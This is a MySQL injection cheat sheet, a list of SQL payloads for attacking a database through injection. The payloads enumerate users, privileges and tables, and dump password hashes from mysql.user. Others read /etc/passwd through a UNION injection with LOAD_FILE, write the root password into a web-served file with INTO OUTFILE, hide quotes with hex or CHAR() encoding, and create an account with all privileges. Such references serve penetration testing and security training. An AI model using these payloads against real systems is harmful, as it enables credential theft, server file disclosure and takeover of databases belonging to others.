Basic MySQL Injection Cheat Sheet

Version

SELECT @@version;

Comments

SELECT 1; #comment
SELECT /*comment*/1;

Current User

SELECT user();
SELECT system_user();

List Users

SELECT user FROM mysql.user;

List Password Hashes

SELECT host, user, password FROM mysql.user;

List Privileges

SELECT grantee, privilege_type, is_grantable FROM information_schema.user_privileges;
SELECT host, user, Select_priv, Insert_priv, Update_priv, Delete_priv, Create_priv, Drop_priv, Reload_priv, Shutdown_priv, Process_priv, File_priv, Grant_priv, References_priv, Index_priv, Alter_priv, Show_db_priv, Super_priv, Create_tmp_table_priv, Lock_tables_priv, Execute_priv, Repl_slave_priv, Repl_client_priv FROM mysql.user;
SELECT grantee, table_schema, privilege_type FROM information_schema.schema_privileges;

List privileges for the user on column:

SELECT table_schema, table_name, column_name, privilege_type FROM information_schema.column_privileges;

List DBA Accounts

SELECT grantee, privilege_type, is_grantable FROM information_schema.user_privileges WHERE privilege_type = 'SUPER';
SELECT host, user FROM mysql.user WHERE Super_priv = 'Y';

Current Database

SELECT database();

List Databases

SELECT schema_name FROM information_schema.schemata;
SELECT DISTINCT(db) FROM mysql.db;

List Columns

SELECT table_schema, table_name, column_name FROM information_schema.columns WHERE table_schema != 'mysql' AND table_schema != 'information_schema';

List Tables

SELECT table_schema,table_name FROM information_schema.tables WHERE table_schema != 'mysql' AND table_schema != 'information_schema';

Find Tables From Column Name

SELECT table_schema, table_name FROM information_schema.columns WHERE column_name = 'username';

Select Nth Row

SELECT host,user FROM user ORDER BY host LIMIT 1 OFFSET 0; # rows numbered 1
SELECT host,user FROM user ORDER BY host LIMIT 1 OFFSET 1; # rows numbered 2

Select Nth Char

SELECT substr('abcd', 3, 1); # returns c

Bitwise AND

SELECT 6 & 2; # returns 2
SELECT 6 & 1; # returns 0

ASCII Value -> Char

SELECT CHAR(65); # returns A

Char -> ASCII Value

SELECT ASCII('A'); # returns 65

Casting

SELECT CAST('1' AS unsigned integer); # returns 1
SELECT CAST('123' AS char); # returns 123

String Concatenation

SELECT CONCAT('A','B'); # returns AB
SELECT CONCAT('A','B','C'); # returns ABC

If Statement

SELECT IF(1=1,'foo','bar'); # returns 'foo'
SELECT IF(1=2,'foo','bar'); # returns 'bar

Case Statement

SELECT CASE WHEN (1=1) THEN 'A' ELSE 'B' END; # returns A
SELECT CASE WHEN (1=2) THEN 'A' ELSE 'B' END; # returns B

Avoiding Quotes

SELECT 0x414243; # returns ABC using hexadecimal

Time Delay

SELECT BENCHMARK(1000000,MD5('A'));

Local File Access

...' UNION ALL SELECT LOAD_FILE('/etc/passwd')
SELECT * FROM mytable INTO dumpfile '/tmp/somefile';

Create Users

CREATE USER test1 IDENTIFIED BY 'pass1';

Delete Users

DROP USER test1;

Make User DBA

GRANT ALL PRIVILEGES ON *.* TO test1@'%';

Location of DB files

SELECT @@datadir;

Write query result into file

SELECT password FROM tablename WHERE username = 'root' INTO OUTFILE '/path/location/on/server/www/passes.txt';

Write query result into file without single quotes

SELECT password FROM tablename WHERE username = CONCAT(CHAR(39),CHAR(114),CHAR(111),CHAR(111),CHAR(116),CHAR(39)) INTO OUTFILE CONCAT(CHAR(39),CHAR(47),CHAR(116),CHAR(109),CHAR(112),CHAR(47),CHAR(112),CHAR(97),CHAR(115),CHAR(115),CHAR(101),CHAR(115),CHAR(46),CHAR(116),CHAR(120),CHAR(116),CHAR(39));

Above query is equal to:

SELECT password FROM tablename WHERE username = 'root' INTO OUTFILE '/tmp/passes.txt';